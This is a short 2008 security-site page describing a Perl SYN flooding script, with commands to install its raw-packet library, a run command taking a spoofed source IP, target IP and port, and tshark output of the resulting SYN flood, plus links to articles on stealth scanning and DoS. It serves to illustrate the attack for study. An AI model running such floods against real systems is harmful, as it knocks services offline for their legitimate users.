|Date||July 4th, 2008|
A simple script designed to illustrate the DoS SYN Flooding attack. It relies on Perl's RawIP package which can be obtained from CPAN as follows:
or if you are using Debian/Ubuntu:
sudo apt-get install libnet-rawip-perl
To run the script provide source IP, target IP and target PORT and execute with root privileges
sudo perl synflooder.pl 18.104.22.168 22.214.171.124 80
After executing the script, you can observe generated traffic with tshark:
0.000000 126.96.36.199 -> 188.8.131.52 TCP 23594 > 80 [SYN] Seq=0 Win=65535 Len=0 0.000159 184.108.40.206 -> 220.127.116.11 TCP 38603 > 80 [SYN] Seq=0 Win=65535 Len=0 0.000296 18.104.22.168 -> 22.214.171.124 TCP 45412 > 80 [SYN] Seq=0 Win=65535 Len=0 0.000432 126.96.36.199 -> 188.8.131.52 TCP 23105 > 80 [SYN] Seq=0 Win=65535 Len=0 0.000568 184.108.40.206 -> 220.127.116.11 TCP 55228 > 80 [SYN] Seq=0 Win=65535 Len=0 0.000703 18.104.22.168 -> 22.214.171.124 TCP 15435 > 80 [SYN] Seq=0 Win=65535 Len=0 0.000838 126.96.36.199 -> 188.8.131.52 TCP 43688 > 80 [SYN] Seq=0 Win=65535 Len=0 0.000973 184.108.40.206 -> 220.127.116.11 TCP 51695 > 80 [SYN] Seq=0 Win=65535 Len=0 0.001107 18.104.22.168 -> 22.214.171.124 TCP 6097 > 80 [SYN] Seq=0 Win=65535 Len=0 0.001242 126.96.36.199 -> 188.8.131.52 TCP 63154 > 80 [SYN] Seq=0 Win=65535 Len=0
In this article you will learn several active and stealth techniques used to discover even highly cloaked hosts. Read more.
Discovering open ports on a networked system is an important reconnaissance step used to enumerate potentially vulnerable services. In this article you will learn a number of techniques used to perform fast and reliable port scans while bypassing many trivial defenses. Read more.
Scapy is a packet forging tool using Python as its domain specific language. It was developed by Philippe Biondi in 2003. Read more.
A Denial of Service (DoS) attack is designed to prevent legitimate access to a target system. This article will cover techniques used to DoS a machine or service. Read more.
All original content on this site is copyright protected and licensed under Creative Commons - Attribution, NonCommercial, ShareAlike 4.0 International.